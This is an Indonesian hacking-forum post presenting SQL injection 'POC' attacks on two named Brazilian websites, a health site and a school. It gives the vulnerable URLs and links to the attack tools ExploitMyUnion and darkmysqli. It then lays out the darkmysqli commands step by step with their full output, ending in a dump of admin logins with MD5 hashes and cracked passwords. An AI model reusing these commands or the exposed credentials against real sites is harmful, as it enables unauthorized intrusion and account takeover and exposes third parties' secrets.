POC
http://www.medicor.com.br gw pake ExploitMyUnion_windows.py cara gunainya sma kaya sql helper 2.7, kalo mw nyobain nih http://darkc0de.com/others/ExploitMyUnion_windows.py
POC:
vuln = http://www.medicor.com.br/?pag=dicas_de_saude&id=1
e10adc3949ba59abbe56e057f20f883e >>> 123456
kalo yang http://www.colegiosantarosa-maceio.com.br gw pake darkmysqli nih ada di http://darkc0de.com
vuln: http://www.colegiosantarosa-maceio.com.br/fiqueplugado.php?id=218
POC:
langkah 1:
darkmysqli.py -u "http://www.colegiosantarosa-maceio.com.br/fiqueplugado.php?id=218" --findcol
hasilnya:darkMySQLi URL: http://www.colegiosantarosa-maceio.com.br/fiqueplugado.php?id=218+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de,5,6--
langkah 2 :darkmysqli.py -u "http://www.colegiosantarosa-maceio.com.br/fiqueplugado.php?id=218+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de,5,6" --full
hasilnya :[+] URL: http://www.colegiosantarosa-maceio.com.br/fiqueplugado.php?id=218+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de,5,6
[+] 23:03:19
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: santa_santa
User: santa_santa@localhost
Version: 5.0.89-community
[+] Number of Rows: 144
[Database]: santa_santa
[Table: Columns]
[1]admin_grupos: cd_grupo,ds_grupo,cd_grupo_pai,tabela,has_filho
[2]admin_log: cd_log,usuario,modulo,operacao,dthr
[3]admin_nivel_acesso: cd_nivel_acesso,ds_nivel_acesso
[4]admin_permissao: cd_grupo,cd_user,cd_nivel_acesso
[5]admin_users: cd_user,nome,sis_login,sis_senha,funcao,dthr_ultimologin,ordem
karena sudah dapat tabel admin nya yaitu [5] admin_users gw stop mempersingkat waktu
langkah 3:darkmysqli.py -u "http://www.colegiosantarosa-maceio.com.br/fiqueplugado.php?id=218+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de,5,6" --dump -D santa_santa -T admin_users -C sis_login,sis_senha
ket: -D = database nya
-T = nama tabel nya
-C= nama field nya
hasilnya:[+] URL: http://www.colegiosantarosa-maceio.com.br/fiqueplugado.php?id=218+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de,5,6
[+] 23:09:51
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: santa_santa
User: santa_santa@localhost
Version: 5.0.89-community
[+] Dumping data from database "santa_santa" Table "admin_users"
[+] Column(s) ['sis_login', 'sis_senha']
[+] Number of Rows: 3
[1] antonio:26bf2cf7dc6058466bd3e8e4face7f71 >>>> toinho
[2] santarosa:e10adc3949ba59abbe56e057f20f883e >>>> 123456
[3] junior:2c7cd3f647bf3ce10314e0eb5469d2ad >>>> 0339
afwan kalo ada yg kurang atau salah maklum newbie sob